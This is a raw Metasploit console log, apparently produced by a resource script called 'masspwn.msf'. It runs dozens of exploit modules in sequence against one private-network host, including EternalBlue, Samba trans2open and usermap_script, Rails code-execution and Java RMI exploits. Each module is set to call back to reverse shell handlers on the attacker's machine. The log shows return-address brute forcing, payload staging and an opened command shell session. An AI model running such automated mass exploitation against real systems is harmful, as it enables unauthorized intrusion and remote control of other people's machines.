[*] Exploit running as background job 72.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/http/tiki_calendar_exec
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2078
LPORT => 2078
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 73.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/http/trueonline_p660hn_v2_rce
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2079
LPORT => 2079
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 74.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/http/netgear_r7000_cgibin_exec
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2080
LPORT => 2080
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] Exploit failed: ActiveRecord::ConnectionTimeoutError could not obtain a database connection within 5.000 seconds (waited 5.000 seconds)
[-] Exploit failed: ActiveRecord::ConnectionTimeoutError could not obtain a database connection within 5.000 seconds (waited 5.032 seconds)
[-] Exploit aborted due to failure: unknown: 192.168.1.245:80 - Failed to exploit router.
[*] Started reverse TCP handler on 192.168.1.207:2078
[*] Started reverse TCP handler on 192.168.1.207:2079
[-] Exploit aborted due to failure: unknown: Target does not have tiki-login_scr.php
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[-] Exploit aborted due to failure: unknown: 192.168.1.245:80 - Failed to authenticate to the web interface.
[*] Exploit running as background job 75.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/http/centreon_useralias_exec
[*] Started reverse TCP handler on 192.168.1.207:2080
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2081
[-] Router is not a NETGEAR router
LPORT => 2081
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache-Coyote)", use 'set FingerprintCheck false' to disable this check.
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 76.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/http/advantech_switch_bash_env_exec
[*] Started reverse TCP handler on 192.168.1.207:2081
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2082
LPORT => 2082
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[-] Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/http/netgear_dnslookup_cmd_exec
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2083
LPORT => 2083
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 77.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/http/dlink_hnap_login_bof
[*] Started reverse TCP double handler on 192.168.1.207:2083
resource (masspwn.msf)> set RHOST 192.168.1.245
[-] Router is not a NETGEAR router
[*] Sending payload...
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2084
LPORT => 2084
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 78.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/http/trueonline_p660hn_v1_rce
[*] Started reverse TCP handler on 192.168.1.207:2084
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:80 - Attempting to exploit Dlink DIR-818 / 822 / 823 / 850 [MIPS]
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2085
LPORT => 2085
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 79.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/http/sonicwall_gms_upload
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
[*] 192.168.1.245:80 - Attempting to exploit router...
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2086
LPORT => 2086
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 80.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/http/rails_secret_deserialization
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2087
LPORT => 2087
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[-] Exploit failed: The following options failed to validate: SECRET.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/http/rails_json_yaml_code_exec
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2088
LPORT => 2088
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] Exploit aborted due to failure: unknown: 192.168.1.245:80 - Failed to exploit router.
[-] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache-Coyote)", use 'set FingerprintCheck false' to disable this check.
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 81.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/http/rails_actionpack_inline_exec
[*] Started reverse TCP handler on 192.168.1.207:2088
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] Sending Railsv2 request to 192.168.1.245:80...
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
[*] Sending Railsv3 request to 192.168.1.245:80...
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2089
LPORT => 2089
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 82.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/http/opmanager_socialit_file_upload
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2090
LPORT => 2090
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] Started reverse TCP handler on 192.168.1.207:2089
[*] Sending inline code to parameter: id
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 83.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/http/rails_xml_yaml_code_exec
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2091
LPORT => 2091
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] Started reverse TCP handler on 192.168.1.207:2090
[*] Creating upload directories
[*] Uploading WAR file...
[-] Exploit aborted due to failure: unknown: 192.168.1.245:80 - WAR upload failed
[!] This exploit may require manual cleanup of 'state/archivedata/zip/K7XfCYj' on the target
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 84.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/wyse/hagent_untrusted_hsdata
[*] Started reverse TCP handler on 192.168.1.207:2091
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] Sending Railsv2 request to 192.168.1.245:80...
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
[*] Sending Railsv3 request to 192.168.1.245:80...
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2092
LPORT => 2092
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 85.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/netware/sunrpc/pkernel_callit
[*] Started reverse TCP handler on 192.168.1.207:2092
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:80 - Connecting to the target
[*] 192.168.1.245:80 - Starting the FTP server
[*] 192.168.1.245:80 - Started service listener on 0.0.0.0:21
[*] 192.168.1.245:80 - Generating the EXE
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
[*] 192.168.1.245:80 - Starting the HTTP service
[*] 192.168.1.245:80 - Starting the HTTP service on port 41333
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2093
LPORT => 2093
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[-] Exploit failed: Could not locate a compatible payload for Netware/["x86"]
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/solaris/samba/trans2open
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2094
LPORT => 2094
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 86.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/freebsd/samba/trans2open
[*] Started reverse TCP handler on 192.168.1.207:2094
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:139 - Trying return address 0xffbffaf0...
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2095
LPORT => 2095
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:139 - Trying return address 0xffbffa70...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 87.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/samba/trans2open
[*] 192.168.1.245:80 - Received:
[-] 192.168.1.245:80 - No reply from the target, this may not be a vulnerable system
[*] Started reverse TCP handler on 192.168.1.207:2095
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2096
LPORT => 2096
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:139 - Trying return address 0xffbff9f0...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:139 - Trying return address 0xffbff970...
[*] Exploit running as background job 88.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/samba/chain_reply
[*] Started reverse TCP handler on 192.168.1.207:2096
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2097
LPORT => 2097
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:80 - Server stopped.
[*] 192.168.1.245:139 - Trying return address 0xbfbffdfc...
[*] 192.168.1.245:139 - Trying return address 0xffbff8f0...
[*] 192.168.1.245:139 - Trying return address 0xbfbffcfc...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 89.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/ids/snort_dce_rpc
[*] Started reverse TCP handler on 192.168.1.207:2097
[*] 192.168.1.245:139 - Trying return address 0xffbff870...
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2098
LPORT => 2098
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:139 - Trying return address 0xbfbffbfc...
[*] 192.168.1.245:139 - Trying return address 0xffbff7f0...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:139 - Trying return address 0xbfbffafc...
[*] 192.168.1.245:139 - Trying return address 0xffbff770...
[*] Exploit running as background job 90.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/samba/usermap_script
[*] Started reverse TCP handler on 192.168.1.207:2098
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2099
LPORT => 2099
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] 192.168.1.245:139 - Exploit failed: ActiveRecord::ConnectionTimeoutError could not obtain a database connection within 5.000 seconds (waited 5.000 seconds)
[*] 192.168.1.245:139 - Trying return address 0xbfbff9fc...
[*] 192.168.1.245:139 - Trying return address 0xffbff6f0...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 91.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/samba/nttrans
[*] Started reverse TCP double handler on 192.168.1.207:2099
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2100
LPORT => 2100
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] 192.168.1.245:139 - Trying return address 0xffbff670...
[*] 192.168.1.245:139 - Trying return address 0xbfbff8fc...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] Exploit running as background job 92.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/osx/samba/trans2open
[*] 192.168.1.245:139 - Trying return address 0xffbff5f0...
[*] Started reverse TCP handler on 192.168.1.207:2100
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:139 - Trying return address 0xbfbff7fc...
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2101
LPORT => 2101
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:139 - Trying return address 0xffbff570...
[*] 192.168.1.245:139 - Trying return address 0xbfbff6fc...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:139 - 192.168.1.245:139 Sending crafted SMB packet from 192.168.1.207...
[*] Exploit running as background job 93.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/smb/ms17_010_eternalblue
[*] Started reverse TCP handler on 192.168.1.207:2101
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] Accepted the first client connection...
[*] Accepted the second client connection...
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
[*] 192.168.1.245:139 - Trying return address 0xffbff4f0...
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2102
LPORT => 2102
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:139 - Trying return address 0xbfbff5fc...
[*] Command: echo WFXjDgRvs6SEB1t2;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] Reading from socket B
[*] B: "WFXjDgRvs6SEB1t2\r\n"
[*] Matching...
[*] A is input...
[*] 192.168.1.245:139 - Trying return address 0xffbff470...
[*] 192.168.1.245:139 - Trying return address 0xbfbff4fc...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 94.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/smb/ms09_050_smb2_negotiate_func_index
[*] Started reverse TCP handler on 192.168.1.207:2102
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2103
LPORT => 2103
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] 192.168.1.245:139 - Trying return address 0xffbff3f0...
[*] 192.168.1.245:139 - Trying return address 0xbfbff3fc...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] 192.168.1.245:139 - Trying return address 0xffbff370...
[*] 192.168.1.245:139 - Trying return address 0xbfbff2fc...
[*] 192.168.1.245:139 - Trying return address 0xbffffdfc...
[*] Exploit running as background job 95.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/misc/enterasys_netsight_syslog_bof
[*] Started reverse TCP handler on 192.168.1.207:2103
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2104
LPORT => 2104
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:139 - Trying return address 0xffbff2f0...
[*] 192.168.1.245:139 - Trying return address 0xbfbff1fc...
[*] 192.168.1.245:139 - Trying return address 0xbffffbfc...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:139 - Trying return address 0xffbff270...
[*] 192.168.1.245:139 - Trying return address 0xbfbff0fc...
[*] 192.168.1.245:139 - Trying return address 0xbffff9fc...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] Exploit running as background job 96.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/misc/windows_rsh
[-] 192.168.1.245:445     - Host does NOT appear vulnerable.
[-] 192.168.1.245:445 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Started reverse TCP handler on 192.168.1.207:2104
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2105
LPORT => 2105
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:139 - Trying return address 0xbfbfeffc...
[*] 192.168.1.245:139 - Trying return address 0xbffff7fc...
[*] 192.168.1.245:139 - Trying return address 0xffbff1f0...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] 192.168.1.245:445 - Connecting to the target (192.168.1.245:445)...
[*] 192.168.1.245:445 - Sending the exploit packet (938 bytes)...
[*] 192.168.1.245:445 - Waiting up to 180 seconds for exploit to trigger...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:139 - Trying return address 0xbfbfeefc...
[*] 192.168.1.245:139 - Trying return address 0xffbff170...
[*] 192.168.1.245:139 - Trying return address 0xbffff5fc...
[-] 192.168.1.245:23 - 192.168.1.245:23 Unable to bypass authentication, this target may not be vulnerable
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[-] 192.168.1.245:514 - Exploit failed: No encoders encoded the buffer successfully.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/misc/opennms_java_serialize
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2106
LPORT => 2106
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] 192.168.1.245:23 - 192.168.1.245:23 Unable to bypass authentication, this target may not be vulnerable
[-] 192.168.1.245:139 - Exploit failed [timeout-expired]: Timeout::Error execution expired
[*] 192.168.1.245:139 - Trying return address 0xbfbfedfc...
[*] 192.168.1.245:139 - Trying return address 0xbffff3fc...
[*] 192.168.1.245:139 - Trying return address 0xffbff0f0...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:514 - Trying to exploit Enterasys NetSight 4.0.1.34 / Windows 2003 SP2...
[*] Exploit running as background job 97.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/multi/misc/java_rmi_server
[*] Started reverse TCP handler on 192.168.1.207:2106
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2107
LPORT => 2107
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] Command shell session 2 opened (192.168.1.207:2099 -> 192.168.1.245:46018) at 2019-08-16 00:50:12 -0400
[*] 192.168.1.245:1099 - 192.168.1.245:1099 - Exploting the vulnerable service...
[*] 192.168.1.245:1099 - Using URL: http://0.0.0.0:8080/gTgZG
[*] 192.168.1.245:1099 - Local IP: http://192.168.1.207:8080/gTgZG
[*] 192.168.1.245:139 - Trying return address 0xffbff070...
[*] 192.168.1.245:139 - Trying return address 0xbfbfecfc...
[*] 192.168.1.245:139 - Trying return address 0xbffff1fc...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] 192.168.1.245:139 - Trying return address 0xffbfeff0...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:139 - Trying return address 0xbfffeffc...
[*] 192.168.1.245:139 - Trying return address 0xbfbfebfc...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] Exploit running as background job 98.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/nfs/xlink_nfsd
[*] Started reverse TCP handler on 192.168.1.207:2107
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
[*] 192.168.1.245:1099 - Using URL: http://0.0.0.0:8080/CMZrbrJanJV
[*] 192.168.1.245:1099 - Local IP: http://192.168.1.207:8080/CMZrbrJanJV
[*] 192.168.1.245:1099 - Server started.
[*] 192.168.1.245:1099 - Sending RMI Header...
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2108
LPORT => 2108
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:139 - Trying return address 0xffbfef70...
[*] 192.168.1.245:1099 - Sending RMI Call...
[*] 192.168.1.245:1099 - Replied to request for payload JAR
[*] 192.168.1.245:139 - Trying return address 0xbfffedfc...
[*] 192.168.1.245:139 - Trying return address 0xbfbfeafc...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] Sending stage (53867 bytes) to 192.168.1.245
[*] 192.168.1.245:139 - Trying return address 0xffbfeef0...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:139 - Trying return address 0xbfffebfc...
[*] 192.168.1.245:139 - Trying return address 0xbfbfe9fc...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] Exploit running as background job 99.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/mysql/mysql_yassl_hello
[*] Started reverse TCP handler on 192.168.1.207:2108
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2109
LPORT => 2109
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:139 - Trying return address 0xffbfee70...
[-] 192.168.1.245:1099 - Exploit failed: NoMethodError undefined method `wait' for nil:NilClass
[*] 192.168.1.245:2049 - Trying target Windows 2000 SP4 English...
[*] 192.168.1.245:139 - Trying return address 0xbfffe9fc...
[*] 192.168.1.245:139 - Trying return address 0xbfbfe8fc...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:139 - Trying return address 0xffbfedf0...
[*] 192.168.1.245:139 - Trying return address 0xbfffe7fc...
[*] Exploit running as background job 100.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/mysql/mysql_yassl_hello
[*] 192.168.1.245:139 - Trying return address 0xbfbfe7fc...
[*] Started reverse TCP handler on 192.168.1.207:2109
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2110
LPORT => 2110
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:3306 - Trying target MySQL 5.0.45-community-nt...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] 192.168.1.245:139 - Trying return address 0xffbfed70...
[*] 192.168.1.245:139 - Trying return address 0xbfffe5fc...
[*] 192.168.1.245:139 - Trying return address 0xbfbfe6fc...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:139 - Trying return address 0xffbfecf0...
[*] 192.168.1.245:139 - Trying return address 0x081ed5f2...
[*] 192.168.1.245:139 - Trying return address 0xbfbfe5fc...
[*] 192.168.1.245:139 - Trying return address 0xbfffe3fc...
[*] Exploit running as background job 101.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/mysql/mysql_yassl_getname
[*] Started reverse TCP handler on 192.168.1.207:2110
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
